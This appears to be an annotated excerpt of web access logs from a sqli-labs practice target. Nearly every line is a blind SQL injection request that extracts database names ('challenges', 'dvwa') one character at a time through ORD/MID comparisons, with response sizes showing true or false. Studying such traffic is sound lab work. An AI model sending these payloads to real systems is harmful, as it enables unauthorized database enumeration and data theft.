10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),4,1))>48 AND 'xFZw'='xFZw HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),4,1))>1 AND 'xFZw'='xFZw HTTP/1.1" 200 670

challenges 数据库

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>64 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>98 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1))>99 AND 'RUOp'='RUOp HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>102 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),2,1))>103 AND 'RUOp'='RUOp HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>98 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),3,1))>97 AND 'RUOp'='RUOp HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>108 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>106 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),4,1))>107 AND 'RUOp'='RUOp HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>108 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>106 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),5,1))>107 AND 'RUOp'='RUOp HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>102 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),6,1))>101 AND 'RUOp'='RUOp HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>108 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>110 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),7,1))>109 AND 'RUOp'='RUOp HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>102 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),8,1))>103 AND 'RUOp'='RUOp HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>104 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>100 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>102 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),9,1))>101 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>112 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>120 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>116 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>114 AND 'RUOp'='RUOp HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),10,1))>115 AND 'RUOp'='RUOp HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),11,1))>96 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),11,1))>48 AND 'RUOp'='RUOp HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),11,1))>1 AND 'RUOp'='RUOp HTTP/1.1" 200 670

dvwa 数据库

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>64 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>96 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>112 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>104 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>100 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>98 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),1,1))>99 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>96 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>112 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>120 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>116 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>118 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),2,1))>117 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>96 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>112 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>120 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>116 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>118 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),3,1))>119 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>96 AND 'ZbCG'='ZbCG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>112 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>104 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>100 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>98 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),4,1))>97 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),5,1))>96 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
